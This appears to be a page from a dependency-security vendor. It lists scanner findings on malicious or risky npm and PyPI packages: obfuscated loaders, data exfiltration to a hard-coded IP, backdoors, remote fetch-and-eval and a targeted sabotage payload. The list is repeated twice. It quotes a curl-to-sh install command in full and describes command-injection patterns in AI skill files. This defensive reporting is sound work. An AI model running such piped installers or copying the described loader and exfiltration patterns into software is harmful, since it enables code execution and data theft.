Secure your dependencies. Ship with confidence.

The source code contains heavily obfuscated JavaScript that uses a custom character shuffling function (YWG) to decode an encoded payload stored in variable 'fvm'. The obfuscated code manipulates global variables (global['_V'], global['r'], global['m']) to access Node.js internals like the require function and module object. The decoded payload is then dynamically executed through multiple layers of function calls, culminating in XZs(7942). This multi-stage decoding and execution pattern is consistent with supply chain attacks designed to hide malicious behavior such as backdoors, data exfiltration, or remote code execution. The intentional obfuscation and dynamic code evaluation without transparency are strong indicators of malicious intent designed to evade static analysis and detection systems.

Live on npm for 1 hour and 22 minutes before removal. Socket users were protected even while the package was live.

The code contains risky operations that can enable supply-chain attacks and remote code execution: it downloads remote zip packages and extracts them without validation, and runs pip install/uninstall via shell subprocesses with unverified inputs. It also leaks host identification to an external notify endpoint. There is no evidence of deliberately hidden malware in this fragment (no obfuscation, no hardcoded credentials or reverse shell code), but the behavior (automatic fetching and installing of packages from remote URLs without integrity checks) presents a significant security risk. Recommend treating remote package sources as untrusted, adding integrity checks (hash/signature verification), avoiding shell=True, sanitizing zip entries before extraction, and limiting or requiring user confirmation for installs.

Live on pypi for 2 hours and 33 minutes before removal. Socket users were protected even while the package was live.

The code presents a strong supply-chain and remote-execution risk by automatically downloading and executing remote Python payloads without integrity checks or sandboxing. It also creates and runs external services (Jupyter, Visdom, RStudio) based on user inputs, which can amplify impact if the remote payload is malicious. Mitigations include removing remote code execution paths, adding cryptographic verification (signatures or hash checks), isolating execution (sandboxes or containerization), validating inputs, and avoiding untrusted downloads or executions.

This file contains clear indicators of an in-memory loader/packer: it reads an embedded resource, decrypts/validates it, allocates executable memory, writes native bytes into process memory and patches runtime structures to execute them. Those behaviors (VirtualAlloc/mmap, WriteProcessMemory, /proc/self/mem writes, patching method pointers, dynamic code generation) are characteristic of code injection/sideloading and are not appropriate for a UI toolbar library. Treat this package as highly suspicious and likely malicious (trojanized). Do not use it in production; consider removing and scanning systems where it was used.

The code is highly obfuscated and is designed to secretly collect and transmit sensitive user and system information to external entities via network calls to suspicious IP addresses. This indicates malicious intent.

No clear malicious behavior is visible in this fragment. It performs a POST to a Google Ads client with a query and maps API response rows to a simple object shape. The code is heavily obfuscated/encoded which reduces auditability; combined with lack of visible input validation this warrants caution and further review of surrounding code (GoogleAdsClient implementation, sources of query and credentials). I assess low probability of malware but moderate concern due to obfuscation and missing context; recommend obtaining the unobfuscated source or the module before trusting or publishing.

The codebase behaves as a migration orchestration tool with legitimate migration capabilities but contains a covert backdoor mechanism in selfHidingFile that can disclose server files under license verification and specific GET parameters. This elevates supply-chain risk and security exposure significantly, warranting removal or a thorough security remediation before any production use. The combination of license-bound backdoor payloads, remote manifest/document handling, and extensive filesystem/network interactions creates strong indicators of potential misuse if exposed to adversarial inputs.

This function implements straightforward telemetry/telemetry-exfiltration: it collects device and user identifiers, events and errors from the provided data object and POSTs them to a hard-coded HTTP endpoint (150.241.92.62:9000). Key risks: Authorization/accessKey and user/device identifiers are sent in plaintext (no TLS), the destination is a fixed IP:port rather than a configurable/trustable domain, and there is no validation, redaction, error handling, or opt-out — making silent credential/identifier leakage likely if integrated. Treat this code as high-risk for data leakage; block or remove unless you can verify the endpoint and the data being transmitted are explicitly intended to be sent there.

This settings module contains multiple insecure configurations and several hardcoded secrets and keys that create a substantial supply‑chain and operational security risk if this repository is public or shared. There is no direct evidence of active malware in the code fragment itself, but the committed secrets and permissive production flags (DEBUG, ALLOWED_HOSTS, CORS allow all) materially increase risk of compromise and misuse. Treat this as high security risk: remove secrets from source control, rotate exposed credentials, tighten hosts/CORS/DEBUG, and audit dependent apps and configured endpoints.

This file is a blob of HTML/spam content with embedded links to adult videos, torrent downloads and suspicious redirectors (e.g. https://2023[.]redircdn[.]com/?…, http://rmdown[.]com/link[.]php?hash=…, http://data[.]down2048[.]com/list[.]php?…), plus numerous third-party image URLs. No executable code or proven malware payload is present, but the obfuscated redirects and torrent links pose a high risk of phishing, drive-by downloads or exposure to illicit content. Such anomalous content should be quarantined and removed from any legitimate software dependency.

The script is a convenience bootstrapper but implements high-risk supply-chain and remote code execution patterns: installing unpinned npm packages (which may run lifecycle scripts) and piping a remote script from raw.githubusercontent.com directly into node without integrity checks. The script itself is not obfuscated and contains no embedded payloads, but it creates a simple, reliable path for arbitrary code execution and potential credential theft/exfiltration if either the remote cfat.js or any installed package is compromised. Do not run this script in sensitive or production environments without first: (1) fetching and auditing the remote cfat.js locally, (2) pinning and auditing exact package versions (use a lockfile), (3) verifying artifact integrity (checksums/signatures/pinned commit SHA), and (4) executing in a constrained environment (sandbox, least-privilege account).

Live on pypi for 118 days, 12 hours and 20 minutes before removal. Socket users were protected even while the package was live.

[Skill Scanner] Pipe-to-shell or eval pattern detected All findings: [CRITICAL] command_injection: Pipe-to-shell or eval pattern detected (CI013) [AITech 9.1.4] [CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4] [CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4] This skill documentation describes a legitimate orchestration workflow for multi-step AI media production and maps capabilities to example remote apps consistently. There are supply-chain and privacy risks: the recommended curl|sh install pattern (download-and-execute), opaque auth (infsh login) that will forward credentials to the inference.sh platform, and broad shell execution permissions (Bash(infsh *)). No direct malicious code or obfuscated payloads appear in the supplied text, but the download-execute pattern and centralized routing of user data to external services justify treating this as a medium security risk. Recommend avoiding piped installer usage, verifying checksums manually from dist.inference.sh, reviewing how infsh stores/transmits credentials, and auditing any CLI binary before execution. LLM verification: The skill's functionality and documentation are coherent with its purpose (content pipelines). The main security concern is the recommended install pattern: curl -fsSL https://cli.inference.sh | sh (download-and-execute), and reliance on a non-standard distribution host (dist.inference.sh). Those supply-chain patterns permit arbitrary remote code execution on users' machines and create a high-risk vector for credential harvesting or malicious binaries if the distribution site is compromised. The

The script is designed to leak sensitive information to a remote server, which is a clear indication of malicious behavior.

Live on npm for 14 days, 12 hours and 26 minutes before removal. Socket users were protected even while the package was live.

The code exhibits malicious behavior by collecting sensitive system information and sending it to suspicious external URLs without user consent. This poses a significant security risk.

Live on pypi for 1 hour and 21 minutes before removal. Socket users were protected even while the package was live.

The provided code snippet allows for the execution of arbitrary JavaScript code within a Node.js environment. While it attempts to use `vm.createContext` for sandboxing, it exposes powerful built-in modules like `fs`, `process`, and `require` in the execution context. This significantly weakens the sandbox and creates a high risk of Remote Code Execution (RCE) if the `code` parameter originates from an untrusted source. Malicious code could leverage these exposed modules to read/write files, access environment variables, execute system commands, or establish network connections.

The code implements a cross-platform system resource checker (RAM/Disk) with an additional, high-risk remote dynamic loader pattern. The remote fetch and eval step constitutes the principal security vulnerability and supply-chain risk, as it allows arbitrary code execution and potential backdoors. While the local checks themselves appear benign, the trust boundary is broken by remote code injection. To reduce risk, eliminate remote dynamic loading, or replace with pinned, signed dependencies and verifiable integrity checks. If remote loading must remain, implement strict integrity verification (SRI-like), sandboxing, and code-signing guarantees, and remove eval usage.

The code represents a standard, well-scoped implementation of locale-aware era parsing/formatting in Moment.js. There is no evidence of malicious behavior, data exfiltration, or insecure data handling in this fragment. The observable risks are limited to potential side effects from locale data normalization and dynamic regex caching, which are typical for a localization feature. Overall security risk remains low with careful handling of locale data lifecycle.

This SweetAlert2 bundle contains a malicious, targeted payload. For Russian-language users on specific TLDs, after an initiation delay tracked in localStorage and only after >3 days, the code disables page pointer interactions, injects an <audio> element pointing to a hard-coded external MP3 URL, and attempts to auto-play it in a loop. This is defacement/sabotage and unrelated to the library's purpose — likely a supply-chain compromise. Do not use this package; remove or patch the injected block, rotate any exposed credentials (if any), audit upstream package sources, and restore from a verified clean release.

The code presents several potential security risks and suggests the intent of managing a C2 server, which could be used for malicious purposes. Specifically, the handling of subprocesses with shell=True, the lack of proper input validation, and the exposure of sensitive file operations could facilitate unauthorized actions and access to sensitive data. Therefore, this code should be treated with caution and likely indicates malicious intent in its context.

Significant supply-chain risk signals are present. This module reconstructs JavaScript from embedded Base64 payloads and executes it in workers with eval enabled (and via Blob/object URLs), then performs authenticated outbound network requests carrying rich metadata/telemetry and uses client-side cached identifiers to influence requests. While it aligns superficially with an SDK that manages map rendering and telemetry, the worker-eval + embedded-code execution pattern is a strong indicator of a malicious loader or covert tracking/exfiltration component and warrants deep review, runtime sandboxing, and egress/network allowlisting.

This module intentionally performs high-risk operations: installing user-specified packages, staging and uploading local code, and executing the agent module in-process. If the provided agent code or requirements are untrusted, they can execute arbitrary actions (data access, exfiltration, spawning processes, network calls). The code is not itself obfuscated or clearly malicious, but it provides functionality that can be abused as a supply-chain or remote-execution vector. Recommendations: only run this with trusted agent code and vetted requirements; avoid executing untrusted modules in-process; consider performing static checks, running the agent code inside a strongly isolated sandbox/container, and preventing upload of sensitive files beyond the explicit excludes.

This module is an automation/scraping worker that intentionally executes code provided by task descriptions. That design requires trusting the task source. The code contains multiple high-risk sinks: subprocess with shell=True, exec()/eval of task-supplied code, and browser JS execution. It also copies browser user profiles (cookies/credentials) into temporary profiles, which increases risk of credential theft. If task inputs are untrusted (remote server controlled by attacker or tampered local JSON), an attacker can achieve remote code execution, data exfiltration (files, cookies), or arbitrary system changes. Recommendation: only run with tasks from trusted sources, disable remote task fetching unless secured, avoid copying full user-data profiles, and remove/guard exec/eval/subprocess paths or run worker inside a hardened sandbox/container with least privileges.

The source code contains heavily obfuscated JavaScript that uses a custom character shuffling function (YWG) to decode an encoded payload stored in variable 'fvm'. The obfuscated code manipulates global variables (global['_V'], global['r'], global['m']) to access Node.js internals like the require function and module object. The decoded payload is then dynamically executed through multiple layers of function calls, culminating in XZs(7942). This multi-stage decoding and execution pattern is consistent with supply chain attacks designed to hide malicious behavior such as backdoors, data exfiltration, or remote code execution. The intentional obfuscation and dynamic code evaluation without transparency are strong indicators of malicious intent designed to evade static analysis and detection systems.

Live on npm for 1 hour and 22 minutes before removal. Socket users were protected even while the package was live.

The code contains risky operations that can enable supply-chain attacks and remote code execution: it downloads remote zip packages and extracts them without validation, and runs pip install/uninstall via shell subprocesses with unverified inputs. It also leaks host identification to an external notify endpoint. There is no evidence of deliberately hidden malware in this fragment (no obfuscation, no hardcoded credentials or reverse shell code), but the behavior (automatic fetching and installing of packages from remote URLs without integrity checks) presents a significant security risk. Recommend treating remote package sources as untrusted, adding integrity checks (hash/signature verification), avoiding shell=True, sanitizing zip entries before extraction, and limiting or requiring user confirmation for installs.

Live on pypi for 2 hours and 33 minutes before removal. Socket users were protected even while the package was live.

The code presents a strong supply-chain and remote-execution risk by automatically downloading and executing remote Python payloads without integrity checks or sandboxing. It also creates and runs external services (Jupyter, Visdom, RStudio) based on user inputs, which can amplify impact if the remote payload is malicious. Mitigations include removing remote code execution paths, adding cryptographic verification (signatures or hash checks), isolating execution (sandboxes or containerization), validating inputs, and avoiding untrusted downloads or executions.

This file contains clear indicators of an in-memory loader/packer: it reads an embedded resource, decrypts/validates it, allocates executable memory, writes native bytes into process memory and patches runtime structures to execute them. Those behaviors (VirtualAlloc/mmap, WriteProcessMemory, /proc/self/mem writes, patching method pointers, dynamic code generation) are characteristic of code injection/sideloading and are not appropriate for a UI toolbar library. Treat this package as highly suspicious and likely malicious (trojanized). Do not use it in production; consider removing and scanning systems where it was used.

The code is highly obfuscated and is designed to secretly collect and transmit sensitive user and system information to external entities via network calls to suspicious IP addresses. This indicates malicious intent.

No clear malicious behavior is visible in this fragment. It performs a POST to a Google Ads client with a query and maps API response rows to a simple object shape. The code is heavily obfuscated/encoded which reduces auditability; combined with lack of visible input validation this warrants caution and further review of surrounding code (GoogleAdsClient implementation, sources of query and credentials). I assess low probability of malware but moderate concern due to obfuscation and missing context; recommend obtaining the unobfuscated source or the module before trusting or publishing.

The codebase behaves as a migration orchestration tool with legitimate migration capabilities but contains a covert backdoor mechanism in selfHidingFile that can disclose server files under license verification and specific GET parameters. This elevates supply-chain risk and security exposure significantly, warranting removal or a thorough security remediation before any production use. The combination of license-bound backdoor payloads, remote manifest/document handling, and extensive filesystem/network interactions creates strong indicators of potential misuse if exposed to adversarial inputs.

This function implements straightforward telemetry/telemetry-exfiltration: it collects device and user identifiers, events and errors from the provided data object and POSTs them to a hard-coded HTTP endpoint (150.241.92.62:9000). Key risks: Authorization/accessKey and user/device identifiers are sent in plaintext (no TLS), the destination is a fixed IP:port rather than a configurable/trustable domain, and there is no validation, redaction, error handling, or opt-out — making silent credential/identifier leakage likely if integrated. Treat this code as high-risk for data leakage; block or remove unless you can verify the endpoint and the data being transmitted are explicitly intended to be sent there.

This settings module contains multiple insecure configurations and several hardcoded secrets and keys that create a substantial supply‑chain and operational security risk if this repository is public or shared. There is no direct evidence of active malware in the code fragment itself, but the committed secrets and permissive production flags (DEBUG, ALLOWED_HOSTS, CORS allow all) materially increase risk of compromise and misuse. Treat this as high security risk: remove secrets from source control, rotate exposed credentials, tighten hosts/CORS/DEBUG, and audit dependent apps and configured endpoints.

This file is a blob of HTML/spam content with embedded links to adult videos, torrent downloads and suspicious redirectors (e.g. https://2023[.]redircdn[.]com/?…, http://rmdown[.]com/link[.]php?hash=…, http://data[.]down2048[.]com/list[.]php?…), plus numerous third-party image URLs. No executable code or proven malware payload is present, but the obfuscated redirects and torrent links pose a high risk of phishing, drive-by downloads or exposure to illicit content. Such anomalous content should be quarantined and removed from any legitimate software dependency.

The script is a convenience bootstrapper but implements high-risk supply-chain and remote code execution patterns: installing unpinned npm packages (which may run lifecycle scripts) and piping a remote script from raw.githubusercontent.com directly into node without integrity checks. The script itself is not obfuscated and contains no embedded payloads, but it creates a simple, reliable path for arbitrary code execution and potential credential theft/exfiltration if either the remote cfat.js or any installed package is compromised. Do not run this script in sensitive or production environments without first: (1) fetching and auditing the remote cfat.js locally, (2) pinning and auditing exact package versions (use a lockfile), (3) verifying artifact integrity (checksums/signatures/pinned commit SHA), and (4) executing in a constrained environment (sandbox, least-privilege account).

Live on pypi for 118 days, 12 hours and 20 minutes before removal. Socket users were protected even while the package was live.

[Skill Scanner] Pipe-to-shell or eval pattern detected All findings: [CRITICAL] command_injection: Pipe-to-shell or eval pattern detected (CI013) [AITech 9.1.4] [CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4] [CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4] This skill documentation describes a legitimate orchestration workflow for multi-step AI media production and maps capabilities to example remote apps consistently. There are supply-chain and privacy risks: the recommended curl|sh install pattern (download-and-execute), opaque auth (infsh login) that will forward credentials to the inference.sh platform, and broad shell execution permissions (Bash(infsh *)). No direct malicious code or obfuscated payloads appear in the supplied text, but the download-execute pattern and centralized routing of user data to external services justify treating this as a medium security risk. Recommend avoiding piped installer usage, verifying checksums manually from dist.inference.sh, reviewing how infsh stores/transmits credentials, and auditing any CLI binary before execution. LLM verification: The skill's functionality and documentation are coherent with its purpose (content pipelines). The main security concern is the recommended install pattern: curl -fsSL https://cli.inference.sh | sh (download-and-execute), and reliance on a non-standard distribution host (dist.inference.sh). Those supply-chain patterns permit arbitrary remote code execution on users' machines and create a high-risk vector for credential harvesting or malicious binaries if the distribution site is compromised. The

The script is designed to leak sensitive information to a remote server, which is a clear indication of malicious behavior.

Live on npm for 14 days, 12 hours and 26 minutes before removal. Socket users were protected even while the package was live.

The code exhibits malicious behavior by collecting sensitive system information and sending it to suspicious external URLs without user consent. This poses a significant security risk.

Live on pypi for 1 hour and 21 minutes before removal. Socket users were protected even while the package was live.

The provided code snippet allows for the execution of arbitrary JavaScript code within a Node.js environment. While it attempts to use `vm.createContext` for sandboxing, it exposes powerful built-in modules like `fs`, `process`, and `require` in the execution context. This significantly weakens the sandbox and creates a high risk of Remote Code Execution (RCE) if the `code` parameter originates from an untrusted source. Malicious code could leverage these exposed modules to read/write files, access environment variables, execute system commands, or establish network connections.

The code implements a cross-platform system resource checker (RAM/Disk) with an additional, high-risk remote dynamic loader pattern. The remote fetch and eval step constitutes the principal security vulnerability and supply-chain risk, as it allows arbitrary code execution and potential backdoors. While the local checks themselves appear benign, the trust boundary is broken by remote code injection. To reduce risk, eliminate remote dynamic loading, or replace with pinned, signed dependencies and verifiable integrity checks. If remote loading must remain, implement strict integrity verification (SRI-like), sandboxing, and code-signing guarantees, and remove eval usage.

The code represents a standard, well-scoped implementation of locale-aware era parsing/formatting in Moment.js. There is no evidence of malicious behavior, data exfiltration, or insecure data handling in this fragment. The observable risks are limited to potential side effects from locale data normalization and dynamic regex caching, which are typical for a localization feature. Overall security risk remains low with careful handling of locale data lifecycle.

This SweetAlert2 bundle contains a malicious, targeted payload. For Russian-language users on specific TLDs, after an initiation delay tracked in localStorage and only after >3 days, the code disables page pointer interactions, injects an <audio> element pointing to a hard-coded external MP3 URL, and attempts to auto-play it in a loop. This is defacement/sabotage and unrelated to the library's purpose — likely a supply-chain compromise. Do not use this package; remove or patch the injected block, rotate any exposed credentials (if any), audit upstream package sources, and restore from a verified clean release.

The code presents several potential security risks and suggests the intent of managing a C2 server, which could be used for malicious purposes. Specifically, the handling of subprocesses with shell=True, the lack of proper input validation, and the exposure of sensitive file operations could facilitate unauthorized actions and access to sensitive data. Therefore, this code should be treated with caution and likely indicates malicious intent in its context.

Significant supply-chain risk signals are present. This module reconstructs JavaScript from embedded Base64 payloads and executes it in workers with eval enabled (and via Blob/object URLs), then performs authenticated outbound network requests carrying rich metadata/telemetry and uses client-side cached identifiers to influence requests. While it aligns superficially with an SDK that manages map rendering and telemetry, the worker-eval + embedded-code execution pattern is a strong indicator of a malicious loader or covert tracking/exfiltration component and warrants deep review, runtime sandboxing, and egress/network allowlisting.

This module intentionally performs high-risk operations: installing user-specified packages, staging and uploading local code, and executing the agent module in-process. If the provided agent code or requirements are untrusted, they can execute arbitrary actions (data access, exfiltration, spawning processes, network calls). The code is not itself obfuscated or clearly malicious, but it provides functionality that can be abused as a supply-chain or remote-execution vector. Recommendations: only run this with trusted agent code and vetted requirements; avoid executing untrusted modules in-process; consider performing static checks, running the agent code inside a strongly isolated sandbox/container, and preventing upload of sensitive files beyond the explicit excludes.

This module is an automation/scraping worker that intentionally executes code provided by task descriptions. That design requires trusting the task source. The code contains multiple high-risk sinks: subprocess with shell=True, exec()/eval of task-supplied code, and browser JS execution. It also copies browser user profiles (cookies/credentials) into temporary profiles, which increases risk of credential theft. If task inputs are untrusted (remote server controlled by attacker or tampered local JSON), an attacker can achieve remote code execution, data exfiltration (files, cookies), or arbitrary system changes. Recommendation: only run with tasks from trusted sources, disable remote task fetching unless secured, avoid copying full user-data profiles, and remove/guard exec/eval/subprocess paths or run worker inside a hardened sandbox/container with least privileges.